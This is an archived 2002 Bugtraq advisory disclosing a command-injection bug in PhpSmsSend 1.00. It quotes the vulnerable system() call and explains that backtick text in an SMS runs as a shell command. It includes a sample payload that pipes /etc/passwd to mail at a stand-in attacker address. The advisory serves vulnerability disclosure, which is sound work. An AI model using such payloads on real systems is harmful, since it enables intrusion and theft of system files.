[24026] in bugtraq
PhpSmsSend remote execute commands bug
daemon@ATHENA.MIT.EDU (Indra Kusuma)
Tue Jan 29 16:12:16 2002
Date: Tue, 29 Jan 2002 18:57:51 +0000 (GMT)
From: Indra Kusuma <indra@kusuma.or.id>
To: <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201291838110.3362-100000@mataram.1rstwap.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
---[ PhpSmsSend remote execute commands bug
---[ About PhpSmsSend
PhpSmsSend is a frontend to the SmsSend application. It consists of a
.php file, from which you select one of the available scripts, and then
you can send an SMS wherever you want, all around the world.
PhpSmssend's website is http://zekiller.skytech.org/smssend.php
---[ Affected System
PhpSmsSystem Version 1.00
---[ Description
from file .php :
$str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d 0 ".PROXY;
system($str,$res);
if the sms messages contain a backtick "`" then inside of backtick will be
execute as a system command.
the result of the command will send via sms :), so the command output
should be less than 160 characters to send via sms, but if the command
using pipe (ex : cat /etc/passwd|mail evil@hacker.com) or redirection then
the messages status is successfully :)
---[ Greetz
my Guru GaniSalman, my friend OpsCrew, #indoSniffing and
#medanHacking (DalNet), Fate Research Labs (www.fatelabs.com), LUG STIKOM
(lug.stikom.edu), and the gauli.com owner
---
cheers,
IndraKusuma
